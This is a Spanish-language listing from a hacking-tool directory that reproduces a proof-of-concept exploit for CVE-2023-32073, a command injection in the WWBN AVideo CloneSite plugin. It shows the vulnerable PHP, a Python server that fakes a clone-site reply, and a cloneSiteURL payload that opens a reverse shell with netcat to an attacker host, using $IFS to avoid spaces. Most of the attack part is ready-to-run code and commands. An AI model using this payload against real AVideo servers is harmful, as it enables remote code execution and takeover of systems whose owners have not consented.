Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-32073 — WWBN AVideo RCE autenticado | Kitploit
Herramientas/GitHubGitHub/jmrcsnchz/cve-2023-32073
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubjmrcsnchz/cve-2023-32073

CVE-2023-32073

WWBN AVideo RCE autenticado

Ver Repositorio
12hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

WWBN AVideo {currentVersion} RCE autenticado

Existe una vulnerabilidad de inyección de comandos en plugin/CloneSite/cloneClient.json.php que permite la ejecución remota de código si tienes el plugin CloneSite. Esto es una evasión de la corrección para CVE-2023-30854 que afecta a WWBN Avideo hasta la versión 12.3

Código vulnerable

/plugin/CloneSite/cloneClient.json.php

root@kitploit:~
$json->sqlFile = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->sqlFile));
$json->videoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->videoFiles));
$json->photoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->photoFiles));

// get dump file
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);

El $objClone->cloneSiteURL no está sanitizado correctamente.

Prueba de concepto del exploit

avidexploit.py

root@kitploit:~
Descargar herramienta
from http.server import BaseHTTPRequestHandler, HTTPServer import time hostName = "localhost" serverPort = 8080 class MyServer(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header("Content-type", "application/json") self.end_headers() self.wfile.write(bytes("{\"error\":false,\"msg\":\"\",\"url\":\"https:\/\/attacker.com/\/\",\"key\":\"2d6db3c09e41a9c27dbc72aecc4a6fc0\",\"useRsync\":1,\"videosDir\":\"\/var\/www\/html\/demo.avideo.com\/videos\/\",\"sqlFile\":\"Clone_mysqlDump_644ab263e62d6.sql\",\"videoFiles\":[],\"photoFiles\":[]}", "utf-8")) if __name__ == "__main__": webServer = HTTPServer((hostName, serverPort), MyServer) print("Server started http://%s:%s" % (hostName, serverPort)) try: webServer.serve_forever() except KeyboardInterrupt: pass webServer.server_close() print("Server stopped.")

Ejecutar en la línea de comandos

root@kitploit:~
$ python3 avidexploit.py &
$ ngrok tcp 8080 # opcional si no se ejecuta en un VPS
  • Luego obtén tu IP y puerto públicos. Introduce un cloneSiteURL como el siguiente y luego presiona clonar para lograr la inyección de comandos
root@kitploit:~
http://2.tcp.ngrok.io:14599/;nc$IFS'ATTACKER.COM'$IFS'5555'$IFS-e$IFS/bin/sh;#

Es importante no usar espacios en blanco para que el exploit funcione. Reemplaza los espacios en blanco con $IFS al agregar argumentos a tu RCE

poc

Créditos

  • JM Sanchez
  • https://www.linkedin.com/in/juanmarcosanchez/